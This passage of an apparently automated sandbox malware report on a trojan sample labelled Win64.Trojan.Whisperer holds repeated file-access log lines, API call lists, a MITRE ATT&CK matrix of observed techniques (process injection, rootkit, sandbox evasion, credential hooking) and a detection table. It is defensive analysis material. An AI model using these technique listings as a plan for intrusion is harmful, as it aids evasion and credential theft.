Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 5_2_00007FF67E6C1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

5_2_00007FF67E6C1C64

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000002EA8A697A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_000002EA8A697A40

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	4 Rootkit	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	11 DLL Side-Loading	1 Windows Service	1 Masquerading	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	813 Process Injection	1 Disable or Modify Tools	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Abuse Elevation Control Mechanism	21 Virtualization/Sandbox Evasion	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 DLL Side-Loading	1 Access Token Manipulation	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	813 Process Injection	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Hidden Files and Directories	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Abuse Elevation Control Mechanism	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Obfuscated Files or Information	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Software Packing	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 DLL Side-Loading	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
h2qWqtD73F.exe	55%	ReversingLabs	Win64.Trojan.Whisperer
